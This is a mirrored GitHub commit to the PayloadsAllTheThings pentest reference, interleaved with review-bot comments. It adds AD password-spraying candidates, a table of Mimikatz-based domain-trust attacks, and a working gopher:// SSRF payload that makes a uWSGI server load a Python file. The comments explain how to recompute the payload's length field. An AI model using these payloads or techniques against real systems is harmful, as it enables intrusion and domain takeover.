mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 06:42:47 +00:00
SSRF exploiting WSGI
This commit is contained in:
parent 3a9b9529cb
commit 71171fa78b
2 changed files with 52 additions and 4 deletions
@ -540,10 +540,10 @@ Password spraying refers to the attack method that takes a large number of usern
Most of the time the best passwords to spray are :
- Password123
- Welcome1
- Password123, mimikatz
- Welcome1/Welcome01
- $Companyname1 : $Microsoft1
- SeasonYear : Winter2019*
- SeasonYear : Winter2019*,Spring2020!,Summer2018?
- Default AD password with simple mutations such as number-1, special character iteration (*,?,!,#)
#### Kerberos pre-auth bruteforcing
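Review bot: the new entries blur what is one password and what is several. `- Password123, mimikatz` reads as a single candidate, and the list now mixes `,` (`Winter2019*,Spring2020!,Summer2018?`) and `/` (`Welcome1/Welcome01`) as separators. Put one candidate per bullet, or pick one separator and use it for every variant, so the list can be pasted straight into a spray wordlist. `mimikatz` also sits oddly next to the default-style passwords; if it is a real field observation, say so in a few words.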
@ -1033,6 +1033,17 @@ ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtr
### Trust relationship between domains
* One-way
* Domain B trusts A
* Users in Domain A can access resources in Domain B
* Users in Domain B cannot access resources in Domain A
* Two-way
* Domain A trusts Domain B
* Domain B trusts Domain A
* Authentication requests can be passed between the two domains in both directions
#### Enumerate trusts between domains
```powershell
nltest /trusted_domains
```
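Review bot: the `One-way` bullets should name the trusting and trusted side explicitly, because that is the vocabulary the `TrustDirection` column in the next hunk uses: in `Domain B trusts A`, B is the trusting domain and A is the trusted domain, which is why users in A reach resources in B and not the reverse. Adding `(A = trusted, B = trusting)` to that bullet avoids the usual confusion. Also, `nltest /trusted_domains` is a native executable, so the fence tagged `powershell` works but is misleading; a plain fence, plus one sample output line, would let readers match it to the `SourceName TargetName TrustType TrustDirection` table below.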
@ -1047,6 +1058,19 @@ SourceName TargetName TrustType TrustDirection
domainA.local domainB.local TreeRoot Bidirectional
```
#### Exploit trusts between domains
:warning: Require a Domain-Admin level access to the current domain.
| Source | Target | Technique to use | Trust relationship |
|---|---|---|---|
| Root | Child | Golden Ticket + Enterprise Admin group (Mimikatz /groups) | Inter Realm (2-way) |
| Child | Child | SID History exploitation (Mimikatz /sids) | Inter Realm Parent-Child (2-way) |
| Child | Root | SID History exploitation (Mimikatz /sids) | Inter Realm Tree-Root (2-way) |
| Forest A | Forest B | PrinterBug + Unconstrained delegation ? | Inter Realm Forest or External (2-way) |
### Child Domain to Forest Compromise - SID Hijacking
Most trees are linked with dual sided trust relationships to allow for sharing of resources.
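Review bot: the `Forest A -> Forest B` row ships with a trailing `?` (`PrinterBug + Unconstrained delegation ?`), i.e. an unverified technique in a reference table; either confirm it and drop the `?` or mark the row TODO so nobody copies it as established. Two smaller points: `:warning: Require a Domain-Admin level access` should read `Requires Domain Admin level access`, and the `Child -> Child` / `Child -> Root` rows (`SID History exploitation (Mimikatz /sids)`) cover the same technique as the existing `### Child Domain to Forest Compromise - SID Hijacking` section that follows; link the rows to that section instead of letting two descriptions drift apart, and drop the three extra blank lines added before it.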
@ -1499,3 +1523,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c5
* [SMB Share – SCF File Attacks - December 13, 2017 - @netbiosX](pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/)
* [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)
* [A Red Teamer’s Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179)
* [Carlos Garcia - Rooted2019 - Pentesting Active Directory Forests public.pdf](https://www.dropbox.com/s/ilzjtlo0vbyu1u0/Carlos%20Garcia%20-%20Rooted2019%20-%20Pentesting%20Active%20Directory%20Forests%20public.pdf?dl=0)
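Review bot: the new reference breaks the list's `Title - Date - Author` convention (it is the raw filename, `public.pdf` included) and points at a personal Dropbox share (`?dl=0`), which is unlikely to outlive the page; reformat it as `Pentesting Active Directory Forests - Rooted2019 - Carlos Garcia` and, if the conference publishes the slides itself, link that copy, keeping the Dropbox URL at most as a fallback.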
@ -29,6 +29,7 @@
* [ldap://](#ldap)
* [gopher://](#gopher)
* [netdoc://](#netdoc)
* [SSRF exploiting WSGI](#ssrf-exploiting-wsgi)
* [SSRF to XSS](#ssrf-to-xss)
* [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances)
* [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket)
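Review bot: the entry name is inaccurate: the payload this commit adds speaks the `uwsgi` binary protocol (`UWSGI_FILE`, `uwsgi_exp.py`), which is the uWSGI server's own wire format, not WSGI in general. Rename the entry and anchor to `SSRF exploiting uWSGI` / `#ssrf-exploiting-uwsgi`, and change the `## SSRF exploiting WSGI` heading in the other hunk in step, otherwise the TOC link breaks.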
@ -355,6 +356,28 @@ Wrapper for Java when your payloads struggle with "\n" and "\r" characters.
ssrf.php?url=gopher://127.0.0.1:4242/DATA
```
## SSRF exploiting WSGI
Exploit using the Gopher protocol, full exploit script available at https://github.com/wofeiwo/webcgi-exploits/blob/master/python/uwsgi_exp.py.
```powershell
gopher://localhost:8000/_%00%1A%00%00%0A%00UWSGI_FILE%0C%00/tmp/test.py
```
| Header | | |
|-----------|-----------|-------------|
| modifier1 | (1 byte) | 0 (%00) |
| datasize | (2 bytes) | 26 (%1A%00) |
| modifier2 | (1 byte) | 0 (%00) |
| Variable (UWSGI_FILE) | | | | |
|-----------------------|-----------|----|------------|---|
| key length | (2 bytes) | 10 | (%0A%00) | |
| key data | (m bytes) | | UWSGI_FILE | |
| value length | (2 bytes) | 12 | (%0C%00) | |
| value data | (n bytes) | | /tmp/test.py | |
## SSRF to XSS
by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
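Review bot: the payload only tells uWSGI to load `/tmp/test.py`; nothing in the section says how that file gets onto the host, so readers cannot tell what the precondition is. State it next to the gopher URL. Smaller points: `gopher://localhost:8000/_...` is not PowerShell, so tag the fence as plain text like the `ssrf.php?url=gopher://127.0.0.1:4242/DATA` block just above; the `Header` table has two empty column headings and the `Variable (UWSGI_FILE)` table an empty fifth column, which render as blank cells; and spell out that `datasize` (`%1A%00` = 26) is the little-endian 16-bit length of the key/value block that follows (2 + 10 + 2 + 12 = 26), because that is the value readers must recompute when they change the path. Finally, the heading should say `uWSGI`, since this packet format is that server's own protocol rather than WSGI.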